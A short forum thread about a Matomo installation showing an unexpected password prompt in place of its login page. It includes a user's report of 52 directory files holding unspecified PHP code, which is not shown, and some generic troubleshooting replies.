Hi guys. Recently, I’ve been unable to log into the Matomo installation. The login window doesn’t appear. Instead, I’m prompted for a password. I don’t know the requested password. Does anyone have any ideas?
I don’t see any input field labeled passwd in the Matomo code. I would therefore assume that this message is not coming from Matomo but from your setup and/or web host.
I found 52 files in my matomo directory with php code like this:

Any Ideas?
Looks like something is blocking the normal login page often a plugin, theme, or server config issue. Try disabling recent plugins and checking your .htaccess or server settings. Also clear cache and test again.
